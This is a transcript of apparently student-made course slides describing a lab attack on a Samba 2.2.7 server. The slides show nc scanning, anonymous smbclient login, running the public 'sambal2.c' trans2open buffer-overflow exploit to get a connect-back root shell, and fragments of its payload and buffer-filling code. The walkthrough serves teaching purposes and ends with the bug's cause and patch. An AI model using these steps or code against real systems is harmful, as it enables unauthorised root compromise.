CS 4010 Hacking Samba Server Vulnerabilities. Recon Telnet headers claim the following: –Red Hat Linux release 9 (Shrike) –Kernel 2.4.20-8smp on an i686.

Slides:



Advertisements
Similar presentations
Smashing the Stack for Fun and Profit
Advertisements

Exploring Security Vulnerabilities by Exploiting Buffer Overflow using the MIPS ISA Andrew T. Phillips Jack S. E. Tan Department of Computer Science University.
Network Security Attack Analysis. cs490ns - cotter2 Outline Types of Attacks Vulnerabilities Exploited Network Attack Phases Attack Detection Tools.
Computer Security: Principles and Practice EECS710: Information Security Professor Hossein Saiedian Fall 2014 Chapter 10: Buffer Overflow.
Computer Security: Principles and Practice First Edition by William Stallings and Lawrie Brown Lecture slides by Lawrie Brown Chapter 11 – Buffer Overflow.
Countermeasures 0x610~0x Seokmyung Hong.
Foundations of Network and Computer Security J J ohn Black Lecture #30 Nov 26 th 2007 CSCI 6268/TLEN 5831, Fall 2007.
Breno de MedeirosFlorida State University Fall 2005 Buffer overflow and stack smashing attacks Principles of application software security.
Hacking Presented By :KUMAR ANAND SINGH ,ETC/2008.
By Brian Vees.  SQL Injection  Username Enumeration  Cross Site Scripting (XSS)  Remote Code Execution  String Formatting Vulnerabilities.
CSCI 530L Vulnerability Assessment. Process of identifying vulnerabilities that exist in a computer system Has many similarities to risk assessment Four.
Information Networking Security and Assurance Lab National Chung Cheng University The Ten Most Critical Web Application Security Vulnerabilities Ryan J.W.
Chapter 9 Security Authentication Insider Attacks Exploiting Code Bugs.
Information Networking Security and Assurance Lab National Chung Cheng University 1 A Real World Attack: wu-ftp.
Buffer Overflow sailaja yagnavajhala sailaja yagnavajhala.
SQL Injection and Buffer overflow
Andrea Bittau, Adam Belay, Ali Mashtizadeh, David Maziéres, Dan Boneh
RFC6520 defines SSL Heartbeats - What are they? 1. SSL Heartbeats are used to keep a connection alive without the need to constantly renegotiate the SSL.
Shuo Chen, Jun Xu, Emre C. Sezer, Prachi Gauriar, and Ravishankar K. Iyer Brett Hodges April 8, 2010.
Security Exploiting Overflows. Introduction r See the following link for more info: operating-systems-and-applications-in-
Lecture 0 Appendix on Implementation Threats Material from Warren Page & Chpt 11, Information Security by Mark Stamp.
Computer Security and Penetration Testing
Buffer Overflows Lesson 14. Example of poor programming/errors Buffer Overflows result of poor programming practice use of functions such as gets and.
OSI and TCP/IP Models And Some Vulnerabilities AfNOG th May 2011 – 10 th June 2011 Tanzania By Marcus K. G. Adomey.
Attacking Applications: SQL Injection & Buffer Overflows.
CIS 450 – Network Security Chapter 7 – Buffer Overflow Attacks.
CNIT 127: Exploit Development Ch 4: Introduction to Format String Bugs.
1 Application Security: Electronic Commerce and Chapter 9 Copyright 2003 Prentice-Hall.
Lecture 20 Hacking. Over the Internet Over LAN Locally Offline Theft Deception Modes of Hacker Attack.
Distributed Denial of Service Attacks Shankar Saxena Veer Vivek Kaushik.
CIS 450 – Network Security Chapter 14 – Specific Exploits for UNIX.
Buffer Overflow Attack-proofing by Transforming Code Binary Gopal Gupta Parag Doshi, R. Reghuramalingam The University of Texas at Dallas 11/15/2004.
Hacking Windows 9X/ME. Hacking framework Initial access physical access brute force trojans Privilege escalation Administrator, root privileges Consolidation.
Buffer Overflow Attack Proofing of Code Binary Gopal Gupta, Parag Doshi, R. Reghuramalingam, Doug Harris The University of Texas at Dallas.
What is exactly Exploit writing?  Writing a piece of code which is capable of exploit the vulnerability in the target software.
A Tool for Pro-active Defense Against the Buffer Overrun Attack D. Bruschi, E. Rosti, R. Banfi Presented By: Warshavsky Alex.
Sairajiv Burugapalli. This chapter covers three main categories of classic software vulnerability: Buffer overflows Integer vulnerabilities Format string.
Buffer Overflows Taught by Scott Coté.-. _ _.-. / \.-. ((___)).-. / \ /.ooM \ / \.-. [ x x ].-. / \ /.ooM \ -/ \ /-----\-----/---\--\ /--/---\-----/-----\ / \-
Information Security - 2. A Stack Frame. Pushed to stack on function CALL The return address is copied to the CPU Instruction Pointer when the function.
Group 9. Exploiting Software The exploitation of software is one of the main ways that a users computer can be broken into. It involves exploiting the.
Security Attacks Tanenbaum & Bo, Modern Operating Systems:4th ed., (c) 2013 Prentice-Hall, Inc. All rights reserved.
Databases Kevin Wright Ben Bruckner Group 40. Outline Background Vulnerabilities Log File Cleaning This Lab.
VM: Chapter 7 Buffer Overflows. csci5233 computer security & integrity (VM: Ch. 7) 2 Outline Impact of buffer overflows What is a buffer overflow? Types.
@Yuan Xue Worm Attack Yuan Xue Fall 2012.
Vulnerability / Cybersecurity Research Discussion Dwayne Melancon, CISA Chief Technology Officer and VP of Research & Development.
Lecture 14 Page 1 CS 236 Online Secure Programming CS 236 On-Line MS Program Networks and Systems Security Peter Reiher.
Content Coverity Static Analysis Use cases of Coverity Examples
Buffer Overflows ...or How I Learned to Never Trust the User
Buffer Overflow Buffer overflows are possible because C doesn’t check array boundaries Buffer overflows are dangerous because buffers for user input are.
Protecting Memory What is there to protect in memory?
MySQL Exploit with Metasploit
The Hardware/Software Interface CSE351 Winter 2013
The Linux Operating System
Protecting Memory What is there to protect in memory?
Module 30 (Unix/Linux Security Issues II)
Protecting Memory What is there to protect in memory?
CS 465 Buffer Overflow Slides by Kent Seamons and Tim van der Horst
Advanced Buffer Overflow: Pointer subterfuge
Format String.
Foundations of Network and Computer Security
Smashing the Stack for Fun and Profit
Introduction to Static Analyzer
Understanding and Preventing Buffer Overflow Attacks in Unix
System and Cyber Security
Several Tips on Project 1
Week 3: Format String Vulnerability
Format String Vulnerability
Return-to-libc Attacks
Race Condition Vulnerability
Presentation transcript:

CS 4010 Hacking Samba Server Vulnerabilities

Recon Telnet headers claim the following: –Red Hat Linux release 9 (Shrike) –Kernel smp on an i686 nc –v –z –-z specifies that nc just scans for listening daemons while –v just gives verbose output –cs4010.cs.uwyo.edu [ ] 139 (netbios-ssn) open –This tells me there is a Samba server running since I already know it is a Linux variant. (Or at least posing as such.)

It begins… Knowing from experience and several vulnerability sites that samba is a notoriously unsecure system I began poking around at it even harder: smbclient –N //cs4010/IPC$ –Allows me to log in anonymously using the Samba client

smbclient Anonymous login successful. Domain=[MYGROUP] OS=[Unix] Server=[Samba 2.2.7] Now I know what server it’s running and that I can access the server without the necessity of having a password, or any other authentication token

Research So, now I know I can access a server on the system that is likely vulnerable, but I don’t know how to do it. Security focus provides the answer. –Begin searching for samba vulnerabilities –2.2.7a is a vulnerable system:

Security Focus From past experience I know that this site provides a lot of good security information, in many cases providing specific ‘examples’ of how something is done. Going to the vulnerabilities section, begin a search by vendor. We know that the samba server is version 2.7a. This search reveals numerous vulnerabilities:

Samba Vulnerabilities So, now there’s a list of vulnerabilities specific to the version of Samba we are connecting to. Denial of Service attacks are eliminated, and many require an authenticated user. Since we aren’t authenticated (-N specifies an anonymous connection) we can rule these out as well. The rest are worth trying.

The Exploit In the vulnerability ID 7294: –A buffer overflow vulnerability has been reported for Samba. The problem occurs when copying user- supplied data into a static buffer. By passing excessive data to an affected Samba server, it may be possible for an anonymous user to corrupt sensitive locations in memory. –Successful exploitation of this issue could allow an attacker to execute arbitrary commands, with the privileges of the Samba process. BINGO!!!

sambal2.c./sambal Samba < Remote Root exploit by Schizoprenic Connect back method, Xnuxer-Labs, Usage :./sambal2 Targets: 0 = Linux 1 = FreeBSD/NetBSD 2 = OpenBSD 3.0 and prior 3 = OpenBSD non-exec stack

More sambal2.c ~/4010]$./sambal [+] Listen on port: [+] Connecting back to: [ :45295] [+] Target: Linux [+] Connected to [ :139] [+] Please wait in seconds...! [+] Yeah, I have a root....! Linux cs cs.uwyo.edu smp #1 SMP Thu Mar 13 17:45:54 EST 2003 i686 i686 i386 GNU/Linux uid=0(root) gid=0(root) groups=99(nobody)

How does it work? It’s a standard buffer overflow, as far as I understand. There is a weakness in the function trans2_open() in that it does not check user supplied arguments before it shoves them into a buffer of static size. So, just like last lecture, we fill the buffer with data so we can overwrite the normal return pointer with our own. This combination allows us to execute arbitrary code.

The Source: char buffer[4000]; char exploit_data[] = "\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x90"; This sets everything up for later use. These are the buffers that will be sent to the server, specifically, the trans2open function

Autopsy of a Server This will fill the buffer to be sent to the server with a bunch of useless data. 3 hops, 4 bytes of data each time for (i = 0; i < 4 * 24; i += 8) { memcpy(buffer i, &dummy, 4); memcpy(buffer i, &ret, 4); }

Autopsy Continued After the buffer has a bunch of filler in it we insert our shellcode: memcpy(buffer + sizeof(NETBIOS_HEADER) + s izeof(SMB_HEADER), exploit_data, sizeof(exploit_data) - 1); memcpy(buffer , shellcode, strlen(shellcode));

The Why. The vulnerability exists due to a string operation that copies a client-supplied string to a fixed-size buffer without first comparing the size of the buffer to the length of the string. The buffer happens to be allocated on the stack during a function call, which means that an overflow can easily overwrite the copy of the instruction pointer that is saved on the stack.

Conclusion This was a well known exploit existing because of a buffer overflow vulnerability. With a minimum amount of research and even less work this resulted in a completely compromised system. The solution to this vulnerability is also well known, requiring only a minor patch that has been released by all vendors.

Sources bilities/exploits/sambal2.chttp://downloads.securityfocus.com/vulnera bilities/exploits/sambal2.c Darrah_GCIH.pdfhttp:// Darrah_GCIH.pdf o/ o/

Feedback: Privacy Policy Feedback
Do Not Sell My Personal Information
About project: SlidePlayer Terms of Service

© 2024 SlidePlayer.com. Inc. All rights reserved.